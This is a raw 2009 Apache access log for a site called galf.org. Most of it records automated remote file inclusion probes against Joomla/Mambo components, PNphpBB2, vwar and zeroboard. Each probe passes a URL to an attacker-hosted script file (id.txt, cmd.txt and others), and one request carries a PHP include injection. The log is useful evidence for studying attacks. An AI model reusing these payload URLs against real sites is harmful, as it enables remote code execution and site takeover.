94.136.37.141 - - [07/Sep/2009:05:36:14 -0700] "GET /logs/access.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.136.37.141 - - [07/Sep/2009:05:36:17 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.136.37.141 - - [07/Sep/2009:05:36:40 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.136.37.141 - - [07/Sep/2009:05:36:40 -0700] "GET /logs/access.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.136.37.141 - - [07/Sep/2009:05:36:40 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.136.37.141 - - [07/Sep/2009:05:53:50 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.189.18.73 - - [07/Sep/2009:05:54:24 -0700] "GET /logs/access_090518.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:05:54:24 -0700] "GET /logs/access_090420.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:05:54:24 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:05:54:24 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:05:54:59 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:05:54:59 -0700] "GET /logs/access_090518.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:05:54:59 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:05:55:00 -0700] "GET /logs/access_090420.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
91.121.89.135 - - [07/Sep/2009:05:56:30 -0700] "GET //vwar/backup/errors.php?error=http://www.cuantosexo.com/cjadmin/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.150.247.202 - - [07/Sep/2009:05:57:24 -0700] "GET /logs//cms_detect.php?include=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
59.150.247.202 - - [07/Sep/2009:05:58:41 -0700] "GET /logs/access_090525.log%20%20//cms_detect.php?include=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [07/Sep/2009:05:58:49 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [07/Sep/2009:05:58:51 -0700] "GET /logs/access_090706.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
59.150.247.202 - - [07/Sep/2009:06:01:05 -0700] "GET /logs//cms_detect.php?include=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
59.150.247.202 - - [07/Sep/2009:06:01:05 -0700] "GET /cms_detect.php?include=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
59.150.247.202 - - [07/Sep/2009:06:01:06 -0700] "GET /logs/access_090316.log%20%20//cms_detect.php?include=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
59.150.247.202 - - [07/Sep/2009:06:01:45 -0700] "GET /logs/access_090525.log%20%20//cms_detect.php?include=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:06:01:58 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
66.235.124.132 - - [07/Sep/2009:06:06:14 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "-" "www.galf.org"
66.235.124.132 - - [07/Sep/2009:06:06:26 -0700] "GET /logs/access_090413.log HTTP/1.1" 200 5725136 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:06:07:24 -0700] "GET /logs/access_090727.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:06:07:24 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:06:07:24 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:06:07:52 -0700] "GET /logs/access_090727.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:06:07:52 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:06:07:52 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.190.166.35 - - [07/Sep/2009:06:10:38 -0700] "GET /logs/access_090119.log/errors.php?error=http://tvse.nl/images/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.190.166.35 - - [07/Sep/2009:06:10:38 -0700] "GET /errors.php?error=http://tvse.nl/images/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.190.166.35 - - [07/Sep/2009:06:10:38 -0700] "GET /logs/errors.php?error=http://tvse.nl/images/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
91.121.89.135 - - [07/Sep/2009:06:11:42 -0700] "GET /logs/access_090309.log///vwar/backup/errors.php?error=http://www.cuantosexo.com/cjadmin/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
91.121.89.135 - - [07/Sep/2009:06:11:42 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.cuantosexo.com/cjadmin/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:06:11:43 -0700] "GET /logs/access_090406.log//?_zb_path=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:06:11:43 -0700] "GET /logs/access.log//?_zb_path=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:06:11:43 -0700] "GET /logs//?_zb_path=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 200 4804 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:06:11:43 -0700] "GET /?_zb_path=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:06:12:17 -0700] "GET /?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:06:12:17 -0700] "GET /logs//?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 200 4804 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:06:12:17 -0700] "GET /logs/access_090406.log//?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:06:12:17 -0700] "GET /logs/access.log//?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
91.121.89.135 - - [07/Sep/2009:06:15:06 -0700] "GET /logs/access_090727.log///vwar/backup/errors.php?error=http://www.cuantosexo.com/cjadmin/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:06:15:43 -0700] "GET /logs/access_090406.log//?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:06:15:43 -0700] "GET /?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:06:15:43 -0700] "GET /logs//?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:06:15:43 -0700] "GET /logs/access.log//?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:06:16:28 -0700] "GET /logs/access_090406.log//?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:06:16:28 -0700] "GET /?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:06:16:28 -0700] "GET /logs//?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:06:16:37 -0700] "GET /logs/access_090316.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:06:16:37 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:06:16:37 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:06:16:43 -0700] "GET /logs/access.log//?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.galf.org"
209.51.140.58 - - [07/Sep/2009:06:17:52 -0700] "GET /logs/access.log//?_zb_path=http://geo.metodist.ru/images/sk8.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
209.51.140.58 - - [07/Sep/2009:06:17:52 -0700] "GET /?_zb_path=http://geo.metodist.ru/images/sk8.pdf? HTTP/1.1" 200 1048 "-" "libwww-perl/5.810" "www.galf.org"
209.51.140.58 - - [07/Sep/2009:06:17:52 -0700] "GET /logs//?_zb_path=http://geo.metodist.ru/images/sk8.pdf? HTTP/1.1" 200 4804 "-" "libwww-perl/5.810" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:06:18:10 -0700] "GET /logs/access_090406.log//?_zb_path=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:06:18:11 -0700] "GET /?_zb_path=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:06:18:11 -0700] "GET /logs//?_zb_path=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 200 4804 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:06:18:11 -0700] "GET /logs/access.log//?_zb_path=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:06:19:22 -0700] "GET /logs/access_090511.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:06:20:45 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:06:20:45 -0700] "GET /logs/access_090706.log%20%20///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:06:20:45 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:06:23:03 -0700] "GET /logs/access_090629.log%20%20///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.206.123.177 - - [07/Sep/2009:06:23:05 -0700] "GET /logs/access.log///modules/My_eGallery/index.php?basepath=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
211.206.123.177 - - [07/Sep/2009:06:23:05 -0700] "GET //modules/My_eGallery/index.php?basepath=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
211.206.123.177 - - [07/Sep/2009:06:23:06 -0700] "GET /logs///modules/My_eGallery/index.php?basepath=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
219.85.63.226 - - [07/Sep/2009:06:23:26 -0700] "GET /logs/access_090713.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:23:26 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:23:26 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:23:40 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:23:40 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:23:40 -0700] "GET /logs/access_090713.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:23:46 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:23:46 -0700] "GET /logs/access_090713.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:23:46 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:24:31 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:24:31 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:24:31 -0700] "GET /logs/access_090713.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.219.198.195 - - [07/Sep/2009:06:24:34 -0700] "GET /logs/access.log/errors.php?error=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.219.198.195 - - [07/Sep/2009:06:24:34 -0700] "GET /errors.php?error=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.219.198.195 - - [07/Sep/2009:06:24:34 -0700] "GET /logs/errors.php?error=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.43.202.66 - - [07/Sep/2009:06:25:36 -0700] "GET /?sIncPath=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.0" 200 1032 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "galf.org"
211.43.202.66 - - [07/Sep/2009:06:25:36 -0700] "GET /logs//?sIncPath=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 200 4804 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "galf.org"
219.85.63.226 - - [07/Sep/2009:06:26:05 -0700] "GET /logs/access_090608.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:26:05 -0700] "GET /logs/access_090608.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:26:11 -0700] "GET /logs/access_090608.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:26:58 -0700] "GET /logs/access_090608.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:06:27:00 -0700] "GET ///modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:06:27:01 -0700] "GET /logs/access_090302.log////modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:06:27:01 -0700] "GET /logs////modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:27:01 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:27:01 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:27:01 -0700] "GET /logs/access_090727.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:06:27:07 -0700] "GET /logs/access_090302.log////modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:06:27:07 -0700] "GET ///modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:06:27:07 -0700] "GET /logs////modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:06:27:10 -0700] "GET /logs/access.log////modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:06:27:12 -0700] "GET /logs/access.log////modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:27:55 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:27:55 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:27:55 -0700] "GET /logs/access_090713.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:28:01 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:28:02 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:28:02 -0700] "GET /logs/access_090713.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:28:05 -0700] "GET /logs/access_090504.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:28:06 -0700] "GET /logs/access_090504.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:28:14 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:28:14 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
